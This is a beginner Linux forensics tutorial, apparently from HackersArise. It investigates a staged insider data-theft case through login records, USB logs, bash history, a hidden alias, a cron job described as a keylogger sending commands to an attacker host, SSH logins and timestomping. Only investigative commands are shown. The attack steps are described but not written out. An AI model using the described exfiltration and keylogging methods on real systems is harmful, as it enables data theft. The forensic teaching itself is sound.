National Cyber Warfare Foundation (NCWF)

A practical Linux forensic investigation after data exfiltration, showing how evidence can uncover how sensitive data was stolen.

Welcome back, aspiring DFIR investigators!

Linux machines are everywhere these days, running quietly in the background while powering the most important parts of modern companies. They host databases, file shares, internal tools, email services, and countless other systems that businesses depend on every single day. But the same flexibility that makes Linux so powerful also makes it attractive for attackers. A simple bash shell provides everything someone needs to move files around, connect to remote machines, or hide traces of activity. That is why learning how to investigate Linux systems is so important for any digital forensic analyst.

In an earlier article we walked through the basics of Linux forensics. Today, we will go a step further and look at a scenario, where a personal Linux machine was used to exfiltrate private company data. The employee worked for the organization that suffered the breach. Investigators first examined his company-issued Windows workstation and discovered several indicators tying him to the attack. However, the employee denied everything and insisted he was set up, claiming the workstation wasn’t actually used by him. To uncover the truth and remove any doubts, the investigation moved toward his personal machine, a Linux workstation suspected of being a key tool in the data theft.

Analysis

It is a simple investigation designed for those that are just getting started.

Evidence

Before looking at anything inside the disk, a proper forensic workflow always begins with hashing the evidence and documenting the chain of custody. After that, you create a hashed forensic copy to work on so the original evidence remains untouched. This is standard practice in digital forensics, and it protects the integrity of your findings.

Once we open the disk image, we can see the entire root directory. To keep the focus on the main points, we will skip the simple checks covered in Basic Linux Forensics (OS-release, groups, passwd, etc.) and move straight into the artifacts that matter most for a case involving exfiltration.

Last Login

The first thing we want to know is when the user last logged in. Normally you can run last with no arguments on a live system, but here we must point it to the wtmp file manually:

bash# > last -f /var/log/wtmp

This shows the latest login from the GNOME login screen, which occurred on February 28 at 15:59 (UTC).

To confirm the exact timestamp, we can check authentication events stored in auth.log, filtering only session openings from GNOME Display Manager:

bash# > cat /var/log/auth.log | grep -ai "session opened" | grep -ai gdm | grep -ai liam

From here we learn that the last GUI login occurred at 2025-02-28 10:59:07 (local time).

Timezone

Next, we check the timezone to ensure we interpret all logs correctly:

bash# > cat /etc/timezone

This helps ensure that timestamps across different logs line up properly.

USB

Data exfiltration often involves external USB drives. Some attackers simply delete their shell history, thinking that alone is enough to hide their actions. But they often forget that Linux logs almost everything, and those logs tell the truth even when the attacker tries to erase evidence.

To check for USB activity:

bash# > grep -i usb /var/log/*

finding out information on connected usb drives

Many entries appear, and buried inside them is a serial number from an external USB device.

Syslog also records the exact moment this device was connected. Using the timestamp (2025-02-28 at 10:59:25) we can filter the logs further and collect more detail about the device.

syslog shows more activity on the the usb connections

We also want to know when it was disconnected:

bash# > grep -i usb /var/log/* | grep -ai disconnect

finding out when the usb drive was disconnected

The last disconnect occurred on 2025-02-28 at 11:44:00. This gives us a clear time window: the USB device was connected for about 45 minutes. Long enough to move large files.

Command History

Attackers use different tricks to hide their activity. Some delete .bash_history. Others only remove certain commands. Some forget to clear it entirely, especially when working quickly.

Here is the user’s history file:

bash# > cat /home/liam/.bash_history

exposing exfiltration activity in the bash history file

Here we see several suspicious entries. One of them is transferfiles. This is not a real Linux command, which immediately suggests it might be an alias. We also see a curl -X POST command, which hints that data was uploaded to an HTTP server. That’s a classic exfiltration method. There is also a hidden directory and a mysterious mth file, which we will explore later.

Malicious Aliases

Hackers love aliases, because aliases allow them to hide malicious commands behind innocent-looking names. For example, instead of typing out a long scp or rsync command that would look suspicious in a history file, they can simply create an alias like backup, sync, or transferfiles. To anyone reviewing the history later, it looks harmless. Aliases also help them blend into the environment. A single custom alias is easy to overlook during a quick review, and some investigators forget to check dotfiles for custom shell behavior.

To see what transferfiles really does, we search for it:

bash# > grep "transferfiles" . -r

This reveals the real command: it copied the entire folder “Critical Data TECH*” from a USB device labeled 46E8E28DE8E27A97 into /home/liam/Documents/Data.

This aligns perfectly with our earlier USB evidence. Files such as Financial Data, Revenue History, Stakeholder Agreement, and Tax Records were all transferred. Network logs suggest more files were stolen, but these appear to be the ones the suspect personally inspected.

Hosts

The /etc/hosts file is normally used to map hostnames to IP addresses manually. Users sometimes add entries to simplify access to internal services or testing environments. However, attackers also use this file to redirect traffic or hide the true destination of a connection.

Let’s inspect it:

bash# > cat /etc/hosts

In this case, there is an entry pointing to a host involved in the exfiltration. This tells us the suspect had deliberately configured the system to reach a specific external machine.

Crontabs

Crontabs are used to automate tasks. Many attackers abuse cron to maintain persistence, collect information, or quietly run malicious scripts.

There are three main places cron jobs can exist:

1. /etc/crontab – system-wide

2. /etc/cron.d/ – service-style cron jobs

3. /var/spool/cron/crontabs/ – user-specific entries

Let’s check the user’s crontab:

bash# > cat /var/spool/cron/crontabs/liam

We can see a long string set to run every 30 minutes. This cronjob secretly sends the last five commands typed in the terminal to an attacker-controlled machine. This includes passwords typed in plain text, sudo commands, sensitive paths, and anything else the user entered recently.

This was unexpected. It suggests the system was accessed by someone else, meaning the main suspect may have been working with a third party, or possibly being monitored and guided by them.

To confirm this possibility, let’s check for remote login activity:

bash# > cat /var/log/auth.log | grep -ai accepted

Here we find a successful SSH login from an external IP address. This could be that unidentified person entering the machine to retrieve the stolen data or to set up additional tools. At this stage it’s difficult to make a definitive claim, and we would need more information and further interrogation to connect all the pieces.

Commands and Logins in auth.log

The auth.log file stores not only authentication attempts but also certain command-related records. This is extremely useful when attackers use hidden directories or unusual locations to store files.

To list all logged commands:

bash# > cat /var/log/auth.log | grep -ai command

To search for one specific artifact:

bash# > cat /var/log/auth.log | grep -ai mth

This tells us that the file mth was created in /home/liam using nano by user liam. Although this file had nothing valuable, its creation shows the user was active and writing files manually, not through automated tools.

Timestomping

As a bonus step, we will introduce timestamps, which are essential in forensic work. They help investigators understand the sequence of events and uncover attempts at manipulation that might otherwise go unnoticed. Timestomping is the process of deliberately altering file timestamps to confuse investigators. Hackers use it to hide when a file was created or modified. However, Linux keeps several different timestamps for each file, and they don’t always match when something is tampered with.

The stat command helps reveal inconsistencies:

bash# > stat api

The output shows:

Birth: Feb 28 2025

Change: Nov 17 2025

Modify: Jan 16 2001

This does not make sense. A file cannot be created in 2025, modified in 2001, and changed again in 2025. That means the timestamps were manually altered. A normal file would have timestamps that follow a logical order, usually showing similar creation and modification dates. By comparing these values across many files, investigators can often uncover when an attacker attempted to clean up their traces or disguise their activity.

Timeline

The investigation still requires more evidence, deeper log correlation, and proper interrogation of everyone involved before a final conclusion can be made. However, based on the artifacts recovered from the Linux machine, we can outline a reasonable assumption of how the events might have taken place.

In the days before the breach, Liam was approached by a third-party group interested in acquiring his company’s confidential data. They gained remote access to his computer via SSH, possibly through a proxy, appearing to log in from a public IP address that does not belong to the company network. Once inside, they installed a cronjob designed to collect Liam’s recent commands that acted as a simple keylogger. This allowed them to gather passwords and other sensitive information that Liam typed in the terminal.

With Liam’s cooperation, or possibly after promising him payment, the attackers guided him through the steps needed to steal the corporate files. On February 28, Liam logged in, connected a USB drive, and executed the hidden alias transferfiles, which copied sensitive folders onto his machine. Moments later, he uploaded parts of the data using a curl POST request to a remote server. When the transfer was done, the accomplices disconnected from the machine, leaving Liam with remnants of stolen data still sitting inside his Documents directory.

The combination of the installed cronjob, the remote SSH connection, and the structured method of transferring company files strongly suggests an insider operation supported by outside actors. Liam was not acting alone, he was assisting a third party, either willingly or under pressure.

Summary

The hardest part of digital forensics is interpreting what the evidence actually means and understanding the story it tells. Individual logs rarely show the full picture by themselves. But when you combine login times, USB events, alias behavior, cronjobs, remote connections and other artifacts a clear narrative begins to form. In this case, the Linux machine revealed far more than the suspect intended to hide. It showed how the data was copied, when the USB device was attached, how remote actors accessed the system, and even how attempts were made to hide the tracks through timestomping and aliases. Each artifact strengthened the overall story and connected the actions together into one coherent timeline. This is the true power of digital forensics that turns fragments of technical evidence into a readable account of what really happened. And with every investigation, your ability to find and interpret these traces grows stronger.

If you want skills that actually matter when systems are burning and evidence is disappearing, this is your next step. Our training takes you into real investigations, real attacks, and real analyst workflows. Built for people who already know the basics and want to level up fast, it’s on-demand, deep, and constantly evolving with the threat landscape.

Learn more

Source: HackersArise
Source Link: https://hackers-arise.com/digital-forensics-basic-linux-analysis-after-data-exfiltration/

Digital Forensics: Basic Linux Analysis After Data Exfiltration